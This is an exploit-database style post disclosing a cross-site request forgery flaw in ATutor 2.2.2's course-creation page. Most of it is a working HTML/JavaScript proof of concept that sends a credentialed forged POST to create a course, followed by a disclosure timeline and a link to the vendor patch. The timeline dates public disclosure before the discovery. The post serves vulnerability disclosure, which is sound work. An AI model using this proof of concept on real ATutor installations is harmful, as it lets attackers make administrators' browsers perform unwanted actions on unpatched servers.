
ATutor 2.2.2 Cross Site Request Forgery

Posted on 14 November 2016

# Exploit Title: ATutor_2.2.2 Learning Management System # Cross-Site Request Forgery (Add New Course) # Date: 13-11-2016 # Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2 # Vendor: http://www.atutor.ca/ # Exploit Author: Saravana Kumar # Contact: https://facebook.com/06saravanakumar # Category: webapps # Version: 2.2.2 # Platform: PHP # Tested on: [Kali Linux 2.0 | Windows 7] # Email: 06saravanakumar@gmail.com # Affected URL: http://localhost/ATutor/mods/_core/courses/users/create_course.php ================================== Vulnerability Disclosure Timeline: ================================== 2016-11-07: Found the vulnerability and reported it to the vendor. 2016-11-08: Vendor replied. 2016-11-10: Vendor fixed the vulnerability. 2016-11-11: Patch released. 2016-10-12: Public disclosure. ########################### CSRF PoC ############################### <html> <------ CSRF POC ------> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/ATutor/mods/_core/courses/users/create_course.php", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------34481053430281"); xhr.withCredentials = true; var body = "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="form_course" " + " " + "true " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="MAX_FILE_SIZE" " + " " + "819200 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="course" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="old_access" " + " " + "protected " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="created_date" " + " " + 
"2016-11-07 06:55:20 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="show_courses" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="current_cat" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="title" " + " " + "Programming Language " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="pri_lang" " + " " + "en " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="description" " + " " + "Python " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="category_parent" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="content_packaging" " + " " + "top " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="rss" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="access" " + " " + "protected " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="release_date" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="day_release" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="month_release" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="year_release" " + " " + "2016 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="hour_release" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="min_release" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="end_date" " + " " + "0 " + "-----------------------------34481053430281 " + 
"Content-Disposition: form-data; name="day_end" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="month_end" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="year_end" " + " " + "2017 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="hour_end" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="min_end" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="setvisual" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="banner" " + " " + "x3cpx3eCan fill content what ever you want.x3c/px3e " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="initial_content" " + " " + "1 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="quota" " + " " + "-2 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="filesize" " + " " + "-3 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="tracking" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="copyright" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="boolForce" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="icon" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="MAX_FILE_SIZE" " + " " + "819200 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="customicon"; filename="" " + "Content-Type: application/octet-stream " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; 
name="custOptCount" " + " " + "0 " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="courseId" " + " " + " " + "-----------------------------34481053430281 " + "Content-Disposition: form-data; name="submit" " + " " + "Save " + "-----------------------------34481053430281-- "; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> --------------------------------------------------------------------------- Solution: Patch is available. Install patch using the ATutor Patcher. Link to download patch: http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml ---------------------------------------------------------------------------

 
